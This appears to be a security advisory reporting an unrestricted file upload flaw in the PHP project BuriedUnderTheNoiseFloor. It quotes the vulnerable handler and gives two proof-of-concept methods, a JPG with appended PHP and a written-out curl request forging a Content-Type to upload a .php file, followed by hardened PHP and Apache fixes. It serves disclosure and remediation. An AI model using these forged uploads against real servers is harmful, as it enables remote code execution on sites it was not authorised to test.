Unrestricted Upload of File with Dangerous Type in jspark311/buriedunderthenoisefloor
Reported on Oct 13th 2021
Description
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code onto the system to be attacked; the attack then only needs to find a way to get that code executed.
https://github.com/jspark311/BuriedUnderTheNoiseFloor/
is vulnerable to remote code execution via Unrestricted Upload of File with Dangerous Type, as shown below:
Proof of concept
Vuln variable: $_FILES['upfile']
Snippet:
if (isset($_FILES) && isset($_FILES['upfile'])) {
    if ($_FILES['upfile']['error'] == 0) {
        // 'type' is the Content-Type the client sent, not derived from the file's bytes
        if (in_array($_FILES['upfile']['type'], $allowed)) {
            // the extension is taken verbatim from the client-supplied filename
            $extension = end(explode('.', $_FILES['upfile']['name']));
            $file_path = 'uploads/'.hash('sha256', $_FILES['upfile']['tmp_name'].time()).'.'.$extension;
            if (move_uploaded_file($_FILES['upfile']['tmp_name'], $file_path)) {
                $img = file_get_contents($file_path);
                $state = 1;
                ...
BuriedUnderTheNoiseFloor validates the uploaded file's type, but that type is the client-supplied Content-Type from the multipart request, and the extension taken from the client-supplied filename is never validated. This allows remote code execution, as shown next:
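For comparison with the snippet above, this is an added example of a hardened handler for the same $_FILES['upfile'] input. It is not BuriedUnderTheNoiseFloor's code; the allow-list, the size limit, the upload directory and the helper name store_uploaded_image are all assumptions made for the example. It detects the content type from the file's bytes instead of trusting the request's Content-Type, and assigns the extension from the allow-list instead of copying it from the filename, so a name like test2.php can never reach disk.

```php
<?php
// Added example, not the project's code: hardened replacement for the upload handler.
// Assumes $_FILES['upfile'] from a multipart form and an uploads/ directory that the
// web server has been configured not to execute scripts from.
declare(strict_types=1);

// Allow-list keyed by the MIME type detected from the file content, mapped to the one
// extension the stored file will be given. Neither $_FILES[...]['type'] nor the
// original filename is trusted for anything.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024; // assumed limit for the example

/**
 * Validates one uploaded file and returns its final path on success, or null with
 * $error set when the upload is rejected.
 */
function store_uploaded_image(array $file, string $upload_dir, ?string &$error = null): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        $error = 'upload failed with error code ' . (int) ($file['error'] ?? -1);
        return null;
    }
    // Only accept a file PHP itself received in the current request.
    if (!is_uploaded_file($file['tmp_name'])) {
        $error = 'not an uploaded file';
        return null;
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        $error = 'file too large';
        return null;
    }

    // Sniff the real content type from the bytes; the vulnerable check trusted the
    // Content-Type header, which the PoC simply rewrote to image/jpg.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$detected])) {
        $error = 'unsupported content type ' . var_export($detected, true);
        return null;
    }

    // Second opinion from the image parser: getimagesize() returns false for anything
    // that is not a decodable image, e.g. a bare "<?php phpinfo();?>" file.
    if (@getimagesize($file['tmp_name']) === false) {
        $error = 'file is not a parseable image';
        return null;
    }

    // Random name plus an allow-listed extension: the client's filename and its
    // extension never influence what is written to disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
    $dest = rtrim($upload_dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        $error = 'could not move file';
        return null;
    }
    chmod($dest, 0644); // readable by the web server, not executable
    return $dest;
}

if (isset($_FILES['upfile'])) {
    $path = store_uploaded_image($_FILES['upfile'], __DIR__ . '/uploads', $err);
    if ($path === null) {
        http_response_code(400);
        echo 'Upload rejected: ' . htmlspecialchars((string) $err, ENT_QUOTES, 'UTF-8');
    } else {
        echo 'Stored as ' . htmlspecialchars(basename($path), ENT_QUOTES, 'UTF-8');
    }
}
```

Note what this does and does not stop. A bare PHP script sent with a forged Content-Type (Method 2) is rejected by both finfo and getimagesize. A valid JPEG with PHP appended after the image data (Method 1) still passes content sniffing, but it is stored as a .jpg in a directory the server does not execute scripts from, so the embedded code is never run; if the application wants to strip such trailing data as well, re-encoding the image through GD or Imagick before storing it discards anything after the image stream.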
Payload
Method1:
Generate a valid JPG image with PHP code embedded at the end of it; for example, in a terminal, decode a base64-encoded image:
echo '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' | base64 -d > test2.php
Select this test2.php file for upload
Intercept the request with a proxy and change the Content-Type header to Content-Type: image/jpg
Go to the uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/
and select the newly created PHP file
Observe that the phpinfo() function is executed
Method2:
In a terminal, use curl to send a forged request (a PHP script with an image content type); in this example the path is http://localhost/BuriedUnderTheNoiseFloor-master/
curl -i -s -k -X $'POST' -H $'Host: localhost' -H $'Content-Type: multipart/form-data; boundary=---------------------------13655746569274249392023872903' -H $'Content-Length: 238' -H $'Connection: close' --data-binary $'-----------------------------13655746569274249392023872903\x0d\x0aContent-Disposition: form-data; name=\"upfile\"; filename=\"test2.php\"\x0d\x0aContent-Type: image/jpg\x0d\x0a\x0a<?php phpinfo();?>\x0a\x0d\x0a-----------------------------13655746569274249392023872903--\x0d\x0a' http://localhost/BuriedUnderTheNoiseFloor-master/form.php
Go to the uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/
and select the newly created PHP file
Observe that the phpinfo() function is executed
Impact
The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
This has been fixed by ensuring that PHP execution is disabled for the upload directory on the web server.
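As an added illustration of that fix (not the project's own configuration), the following Apache httpd fragment disables script execution for the uploads directory. It assumes Apache with mod_php, and the document root /var/www/html/BuriedUnderTheNoiseFloor-master is an assumed path matching the URL used in the proof of concept.

```apache
# Added example, not from the project: no script execution in uploads/.
# Assumed path; place in the vhost config, or in uploads/.htaccess if AllowOverride allows it.
<Directory "/var/www/html/BuriedUnderTheNoiseFloor-master/uploads">
    # Turn the PHP engine off for this tree (mod_php only).
    php_flag engine off

    # Drop any handler/type mappings inherited from the parent configuration so a
    # stray .php file is served as plain bytes at most, never interpreted.
    RemoveHandler .php .phtml .phar
    RemoveType .php .phtml .phar

    # Refuse to serve script extensions at all, regardless of PHP SAPI.
    <FilesMatch "\.(php[0-9]?|phtml|phar)$">
        Require all denied
    </FilesMatch>

    # No directory listing (the PoC browsed uploads/ to find the file) and no CGI.
    Options -Indexes -ExecCGI
</Directory>
```

With php-fpm instead of mod_php, php_flag is not available and must be removed; the RemoveHandler and FilesMatch blocks still apply, and the equivalent for the FPM handler is to leave no SetHandler for PHP files within this directory. After applying the change, a quick check is to place a harmless file such as uploads/probe.php containing <?php echo 'x'; and confirm the server returns 403 (or the literal source) rather than x.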